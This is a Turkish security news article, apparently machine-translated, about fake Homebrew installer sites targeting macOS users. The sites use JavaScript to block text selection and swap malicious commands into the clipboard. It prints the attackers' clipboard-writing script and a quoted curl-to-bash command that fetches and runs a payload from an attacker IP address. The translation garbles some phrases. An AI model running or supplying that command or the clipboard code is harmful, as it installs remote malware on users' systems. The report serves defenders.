Meşru paket yöneticisi kurulumlarının yanı sıra kötü amaçlı yükler de sunan sahte Homebrew yükleyici web siteleri aracılığıyla macOS kullanıcılarını hedef alan karmaşık bir kampanya ortaya çıktı.
Saldırı, resmi bira paketinin piksel mükemmel kopyalarını oluşturarak kullanıcıların popüler Homebrew paket yöneticisine duyduğu yaygın güveni istismar ediyor[.]Aldatıcı pano manipülasyon teknikleriyle tamamlanmış sh kurulum sayfası.
Güvenlik araştırmacıları, homebrewfaq da dahil olmak üzere meşru Homebrew web sitesini taklit eden çok sayıda sahte alan adı tespit etti[.]org, homebrewclubs[.]org ve homebrewupdate[.]org.
Bu kötü amaçlı siteler, resmi kurulum arayüzünün ikna edici kopyalarını sunar, ancak kullanıcıların panolarına bilgileri olmadan ek komutlar eklemek için tasarlanmış gizli JavaScript içerir.
Manuel metin seçimine izin veren orijinal Homebrew sayfalarının aksine, bu sahte sürümler, kullanıcıları belirlenmiş bir Kopyala düğmesini kullanmaya zorlayarak, saldırganların standart kurulum komutlarının yanına kötü amaçlı veriler eklemesine olanak tanır.
.webp)
Kampanya, tedarik zinciri saldırılarında önemli bir evrimi temsil ediyor ve paket depolarını değil ilk kurulum sürecini hedef alıyor.
Homebrew yakın zamanda hiçbir taviz vermeden güçlü bir güvenlik geçmişini korurken, tehdit aktörleri güvenilir kurulum kaynağının kimliğine bürünerek etkili bir geçici çözüm keşfetti.
.webp)
Sequence analistleri, ortaya çıkan bu tehdit modelini, bilinen kötü amaçlı yazılım dağıtım ağlarıyla ilişkili şüpheli alanların ve altyapının sistematik olarak izlenmesi yoluyla belirledi.
Saldırı metodolojisi, yürütme ve kaçınma yeteneklerinde dikkate değer bir gelişmişlik göstermektedir.
Saldırganlar, meşru paket depolarından ödün vermek yerine, kritik kurulum aşamasında kullanıcılara müdahale eden paralel bir altyapı geliştirdi.
Bu yaklaşım, kullanıcıların tanıdık kurulum prosedürlerine olan güveninden yararlanırken, veri havuzu izlemeye odaklanan geleneksel güvenlik önlemlerini atlar.
Gelişmiş Pano İşleme Teknikleri
Temel enfeksiyon mekanizması, kurban için şeffaf bir şekilde çalışan JavaScript tabanlı pano manipülasyonuna dayanıyor.
Kullanıcılar sahte sitelerde Kopyala düğmesini tıklattığında, yerleşik kod, beklenen Homebrew kurulum komut dosyasının yanı sıra kötü amaçlı komutlar enjekte etmek için tasarlanmış bir dizi işlemi yürütür.
JavaScript uygulaması, kötü amaçlı komutların nereye eklenmesi gerektiğini açıkça belirten Rusça yorumlar içeriyor ve bu da emtia tarzı bir tehdit hizmetine işaret ediyor.
Kötü amaçlı komut dosyası, kurulum bloğunda bağlam menüsü, seçme başlatma, kopyalama, kesme ve sürükleyerek başlatma işlemlerini devre dışı bırakan olay dinleyicileri aracılığıyla standart metin seçimini engeller.
Bu, kurbanları sağlanan Kopyala düğmesini kullanmaya zorlar ve bu da kopyalanmayı tetikler. copyInstallCommand() işlev. İşlev, farklı tarayıcı ortamlarında uyumluluk için modern Clipboard API’sini veya geri dönüş textarea yöntemlerini kullanarak panoya önceden belirlenmiş bir komut yazar.
const copyCommand = 'echo '; // ← замени на нужную
async function copyInstallCommand () {
await navigator[.]clipboard[.]writeText (copyCommand);
fetch ('notify[.]php', {
method: 'POST',
headers: { 'Content-Type': 'application / json' },
body: JSON[.]stringify ({ event: 'copy_install_command', time: new Date () })
});
}Analiz, aktif kampanyaların aşağıdaki komutları kullandığını ortaya çıkardı: curl - s http[:]//185[.]93[.]89[.]62/d/vipx69930 | nohup bash & Meşru Homebrew kurulumu normal şekilde ilerlerken arka planda ek yükleri indirip çalıştıran, güvenliği ihlal edilmiş sistemlere kalıcı erişim sağlarken operasyonel gizliliği koruyan etkili bir ikili yürütme senaryosu oluşturur.
Daha Fazla Anında Güncelleme Almak için Bizi Google Haberler, LinkedIn ve X’te Takip Edin, CSN’yi Google’da Tercih Edilen Kaynak olarak ayarlayın.
